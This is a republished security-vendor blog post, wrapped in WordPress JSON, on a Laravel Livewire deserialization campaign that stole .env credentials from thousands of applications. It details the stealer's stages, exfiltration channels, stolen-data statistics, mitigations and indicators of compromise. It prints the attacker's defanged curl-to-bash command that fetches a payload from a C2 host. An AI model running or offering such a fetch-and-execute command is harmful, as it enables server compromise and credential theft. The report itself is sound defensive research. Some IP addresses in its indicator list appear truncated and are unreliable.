{"id":65230,"date":"2026-06-23T15:43:42","date_gmt":"2026-06-23T15:43:42","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=65230"},"modified":"2026-06-23T15:43:42","modified_gmt":"2026-06-23T15:43:42","slug":"cve-2025-54068-laravel-livewire-credential-theft-campaign-6000-applications-compromised","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=65230","title":{"rendered":"CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised_IMPERVABLOG:CC22F53AF67610E01435FC711BB2B03F"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-06-23T19:36:51&#8243;,&#8221;description&#8221;:&#8221;## **Introduction**\\n\\nOn May 24, 2026, Imperva observed exploitation attempts against Laravel Livewire applications, blocked by the Imperva Cloud WAF. What initially appeared to be unremarkable deserialization attack traffic turned out to be part of a large-scale credential theft operation exploiting CVE-2025-54068, a critical unauthenticated RCE vulnerability in Laravel Livewire v3 (versions up to v3.6.3).\\n\\nThe campaign, first documented here, has been running for several months, as evidenced by the large volume of stolen data. Recovery and analysis of the attacker&#8217;s exfiltration infrastructure revealed credentials harvested from 6,167 distinct applications spanning dozens of countries and sectors, from e-commerce and healthcare to financial services, education, and government. The attacker&#8217;s FTP server contained 1,851+ database dumps and 18+ email lists with over 26 million addresses, indicating the stolen credentials were being actively exploited. 
Attribution indicators throughout the malware and associated infrastructure point to an Indonesian-origin threat actor.\\n\\n## **Attack Vectors and TTPs**\\n\\n### **Initial Access: CVE-2025-54068 Exploitation**\\n\\nCVE-2025-54068 is a critical vulnerability in Laravel Livewire v3 caused by improper validation of component property updates during the framework&#8217;s hydration process. When a Livewire component state is restored from a browser request, Livewire v3 (up to v3.6.3) fails to verify the integrity of the submitted data before deserializing it. An unauthenticated attacker can inject a malicious serialized PHP object into this request, triggering arbitrary code execution on deserialization.\\n\\nThe following HTTP request, reconstructed from our captured attack traffic, illustrates the exploitation:\\n\\nFor full technical details on this vulnerability, please see the disclosure here.\\n\\n### **Payload Analysis**\\n\\nThe exploitation requests we captured contained serialized PHP objects constructed using PHPGGC gadget chains. These chains abuse legitimate PHP classes already present in Laravel applications to achieve code execution during deserialization. The attacker&#8217;s payload executes the following command:\\n    \\n    \\n    **curl -skfsSL hxxps:\/\/xantibot[.]pw\/database-sell\/shoc.enz | tr -d &#8216;\\\\r&#8217; | bash \\u003e\/dev\/null 2\\u003e\\u00261 \\u0026**\\n\\nThis fetches a shell script from the attacker&#8217;s C2 server and pipes it directly into bash, executing it in the background with all output suppressed.\\n\\n## **Malware Analysis**\\n\\nThe credential stealer deployed in this campaign is a 5,269-byte Bash shell script named shoc.enz (**SHA256: 548c3672fd3201dab56f714fdd5812bb024980815b3a2b6299f0126bdf16fb3e**). At the time of our analysis, this sample was not present in VirusTotal.\\n\\n### **Execution Flow**\\n\\nThe malware follows an eight-stage execution process:\\n\\n  1. 
**Environment Setup** : Creates a temporary working directory at \/tmp\/xxxxx\\n  2. **Process Check** : Verifies no existing shoc.sh processes are running to prevent multiple instances\\n  3. **File Discovery** : Recursively scans the entire filesystem for .env files using the find command\\n  4. **Credential Extraction** : Parses discovered files for DB_HOST, DB_DATABASE, DB_USERNAME, DB_PASSWORD, and APP_KEY values\\n  5. **Data Collection** : Copies matching files to a staging directory with randomized filenames\\n  6. **Compression** : Archives collected files using zip or tar.gz\\n  7. **Exfiltration** : Uploads archives to three separate C2 channels\\n  8. **Cleanup** : Deletes the local staging directory to remove forensic evidence\\n\\n\\n\\n### **Exfiltration Infrastructure**\\n\\nThe threat actor operates a redundant three-channel exfiltration system:\\n\\n**Channel** | **Endpoint** | **Purpose**  \\n&#8212;|&#8212;|&#8212;  \\nPrimary | FTP @ 47.129.100.149:21 | Main credential storage  \\nSecondary | api.telegram.org | Notifications and small file uploads  \\nTertiary | upload.gofile.io | Backup cloud storage  \\n  \\nOur investigation confirmed active access to all three channels. The FTP server contained 7 directories of stolen data, including full database dumps such as FULL_DUMP_[REDACTED_IP]\\u003e_2026-04-29_0418.sql.gz. The GoFile account showed owner-level access with 11,179 files totalling 309.9 MB.\\n\\n### **Attribution Indicators**\\n\\nMultiple indicators point to an Indonesian-origin threat actor: Indonesian-language comments in the malware source code, a timezone reference to Asia\/Jakarta, and the Telegram handle @ashtarotz (\\&#8221;\u9ed0\u7dda\u4f6c Wong Gen Deng\\&#8221;) linked to xantibot[.]pw, a domain that presents publicly as a legitimate anti-bot service while hosting the malware payload. 
Analysis of the domain and Telegram channel metadata also points to Indonesian origin.\\n\\nThe GoFile exfiltration account was registered to azrilsyahputra1337@gmail[.]com. Cross-referencing this address against public breach data reveals it appears in three separate historical breaches of BreachForums (November 2022, August 2025, and March 2026), placing the operator within underground breach communities over an extended period.\\n\\n## **What Was Stolen: Analysis of the Recovered Data**\\n\\nLaravel applications store all sensitive configuration in a single .env file: database credentials, API keys, payment processor secrets, cloud access keys, and encryption keys. This makes the file an exceptionally high-value target. A single .env file can provide everything needed to access the application&#8217;s database, impersonate users, process payments, and access cloud infrastructure.\\n\\nAnalysis of the recovered collection revealed credentials from 6,167 distinct applications. Of 21,916 unique files analysed, 29% declared a production environment, though the true proportion is higher as many files labeled local contained live payment keys and real domain URLs.\\n\\nThe breakdown of exposed credentials:\\n\\n**Credential Type** | **Count**  \\n&#8212;|&#8212;  \\nDatabase passwords (real, non-default) | 14,566 (66.5%)  \\nProduction applications with DB credentials | 5,784  \\nConfirmed live Stripe secret keys (sk_live_) | 188  \\nValid AWS IAM credentials (AKIA format) | 381  \\nJWT secrets | 2,929  \\nGoogle OAuth client secrets (GOCSPX-) | 2,409  \\nFilament admin panel passwords | 2,232  \\nSMTP passwords | 7,176 (32.7%)  \\n  \\n \\n\\nThe FTP server contained over 1,850 full database dump files, confirming the stolen credentials were actively used to extract database contents.\\n\\n## **Targeting**\\n\\nThe campaign scanned for vulnerable Laravel installations indiscriminately, with victims spanning online gambling and betting (400+ platforms, predominantly 
Brazilian and Southeast Asian operators), e-commerce, healthcare, education, logistics, and financial services. Multiple confirmed .gov domains were present in the dataset, showing the scanner made no distinction between commercial and public-sector targets. Recognizable open-source Laravel applications were present in the dataset, including the invoicing platform Invoice Ninja, accounting software Akaunting, event ticketing platform Attendize, photo gallery Lychee, and restaurant management system TastyIgniter. Applications were registered across .com, .ru, .site, .online, .br, .tr, .id, .ke, and dozens of other TLDs. Any organization running unpatched Laravel Livewire v3 was a potential victim.\\n\\n## **Conclusion and Recommendations**\\n\\nThis campaign illustrates how straightforward credential theft, when combined with a high-impact vulnerability and automated scanning, can scale to thousands of victims in a short window. Recovery of the exfiltration infrastructure revealed credentials from over 6,000 distinct applications, including 188 live Stripe payment keys, 381 valid AWS IAM credentials, and database passwords for nearly 5,800 confirmed production systems. For many victims, the initial server compromise is only the beginning of the exposure.\\n\\nWe recommend the following actions for defenders:\\n\\n  1. **Patch immediately** : Update Laravel Livewire to version 3.6.4 or later to remediate CVE-2025-54068. This is the single most effective mitigation.\\n  2. **Block outbound FTP** : Production web servers should not require outbound FTP access. Block port 21 egress and alert on any connection attempts to 47.129.100.149.\\n  3. 
**Monitor for suspicious API access** : Alert on connections from web servers to api.telegram.org and upload.gofile.io, which are atypical for production Laravel applications.\\n\\n\\n\\nIf you believe your organization has been compromised, rotate all database credentials and Laravel APP_KEY values immediately, and review database access logs for unauthorized activity.\\n\\n## **Indicators of Compromise**\\n\\n### **IP Addresses**\\n\\n  * 86.88.234 (Attack source)\\n  * 129.100.149 (FTP C2 server)\\n  * 63.67.153 (Webhook server)\\n\\n\\n\\n### **Domains and URLs**\\n\\n  * pw\\n  * hxxps:\/\/xantibot[.]pw\/database-sell\/shoc.enz\\n  * hxxps:\/\/webhook[.]site\/b156c0b1-3e2f-41b4-a9a3-f492e50a0595\\n\\n\\n\\n### **File Hashes (SHA-256)**\\n\\n  * 548c3672fd3201dab56f714fdd5812bb024980815b3a2b6299f0126bdf16fb3e (shoc.enz)\\n\\n\\n\\n### **MITRE ATT\\u0026CK Mapping**\\n\\n**Technique ID** | **Technique Name** | **Campaign Usage**  \\n&#8212;|&#8212;|&#8212;  \\nT1190 | Exploit Public-Facing Application | CVE-2025-54068 exploitation  \\nT1059.004 | Unix Shell | Bash script execution via piped curl  \\nT1105 | Ingress Tool Transfer | curl retrieval of shoc.enz payload  \\nT1083 | File and Directory Discovery | Recursive filesystem scan for .env files  \\nT1552.001 | Credentials In Files | .env file harvesting  \\nT1560.001 | Archive Collected Data: Archive via Utility | zip\/tar.gz staging archive creation  \\nT1041 | Exfiltration Over C2 Channel | Telegram Bot API exfiltration  \\nT1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol | FTP exfiltration to 47.129.100.149  \\nT1567.002 | Exfiltration to Cloud Storage | GoFile uploads  \\nT1070.004 | File Deletion | Staging directory cleanup post-exfiltration  \\nT1036 | Masquerading | Randomized archive and staging folder names  \\n  \\n \\n\\n_Imperva Threat Research continues to monitor this campaign. Imperva customers are fully protected against exploitation of CVE-2025-54068. 
Customers requiring further guidance on this vulnerability are encouraged to contact Imperva support._\\n\\nThe post CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised appeared first on Blog.&#8221;,&#8221;published&#8221;:&#8221;2026-06-23T18:01:17&#8243;,&#8221;modified&#8221;:&#8221;2026-06-23T18:01:17&#8243;,&#8221;type&#8221;:&#8221;impervablog&#8221;,&#8221;title&#8221;:&#8221;CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;IMPERVABLOG:CC22F53AF67610E01435FC711BB2B03F&#8221;,&#8221;bulletinFamily&#8221;:&#8221;blog&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-54068&#8243;],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,
&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.imperva.com\/blog\/cve-2025-54068-laravel-livewire-credential-theft-campaign-6000-applications-compromised\/&#8221;,&#8221;category_name&#8221;:&#8221;News&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-06-23T19:36:51&#8243;,&#8221;description&#8221;:&#8221;## **Introduction**\\n\\nOn May 24, 2026, Imperva observed exploitation attempts against Laravel Livewire applications, blocked by the Imperva Cloud WAF. 
What initially appeared to be unremarkable&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[9,6,8,35,12,59,13,7,11,5],"class_list":["post-65230","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-impervablog","tag-news","tag-security","tag-tapic","tag-vulnerability"]}